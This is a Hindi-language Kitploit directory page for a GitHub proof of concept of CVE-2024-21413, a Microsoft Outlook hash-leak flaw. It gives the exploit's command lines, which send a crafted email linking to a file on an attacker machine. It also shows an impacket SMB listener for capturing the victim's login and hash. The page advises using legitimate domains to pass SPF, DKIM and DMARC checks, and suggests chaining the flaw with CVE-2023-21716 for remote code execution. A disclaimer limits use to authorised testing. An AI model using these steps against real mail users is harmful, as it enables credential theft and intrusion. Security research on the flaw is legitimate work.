Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-21413-POC — Microsoft Outlook सूचना प्रकटीकरण भेद्यता (पासवर्ड हैश लीक) - CVE-2024-21413 POC | Kitploit
उपकरण/GitHubGitHub/r00tb1t/cve-2024-21413-poc
पासवर्ड क्रैकिंगभेद्यता विश्लेषणशोषणजानकारी एकत्र करनालर्निंग और शिक्षाईमेल सुरक्षा
GitHubr00tb1t/cve-2024-21413-poc

CVE-2024-21413-POC

Microsoft Outlook सूचना प्रकटीकरण भेद्यता (पासवर्ड हैश लीक) - CVE-2024-21413 POC

रिपॉजिटरी देखें
1722 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-21413 - POC

उपयोग:

python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url xx.xx.xx.xx/path/to/shared/file/r0tb1t.rtf

[!NOTE] r00tb1t : हमलावर मशीन (xx.xx.xx.xx) से साझा की गई परीक्षण फ़ाइल (इस मामले में Word) है।

SPF, DKIM और DMARC अनुपालन सुनिश्चित करने के लिए, वैध $IP और डोमेन का उपयोग करें।

यदि आपने पहले से नहीं किया है, तो pip install pexpect का उपयोग करके pexpect लाइब्रेरी इंस्टॉल करना सुनिश्चित करें।

POC चलाने के लिए सुझाव:

  • एक SMB लिसनर चलाएं impacket-smbserver -smb2support -ip 0.0.0.0 test /tmp .
  • POC चलाएं

python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url example.com/path/to/shared/file/r0tb1t.rtf

  • प्राप्त मेल में दिए गए लिंक पर क्लिक करें, और BOOM आपको लिसनर में लॉगिन और हैश मिल जाना चाहिए
  • इस CVE को CVE-2023-21716 के साथ जोड़कर RCE प्राप्त करें !!!
  • बहुत-बहुत धन्यवाद और CVE-2024-21413 पर विवरण .
  • वर्कअराउंड/फिक्स:

[!CAUTION] ⚠️ अस्वीकरण: महत्वपूर्ण: यह स्क्रिप्ट केवल शैक्षिक, नैतिक परीक्षण और वैध उपयोग के लिए प्रदान की गई है। इसे किसी भी सिस्टम या नेटवर्क पर बिना स्पष्ट अनुमति के उपयोग न करें। कंप्यूटर सिस्टम और नेटवर्क तक अनधिकृत पहुँच अवैध है, और अनधिकृत गतिविधियाँ करते पकड़े गए उपयोगकर्ता कानूनी कार्रवाई के अधीन हैं। लेखक इस स्क्रिप्ट के दुरुपयोग से हुए किसी भी नुकसान के लिए ज़िम्मेदार नहीं है..

टूल डाउनलोड करें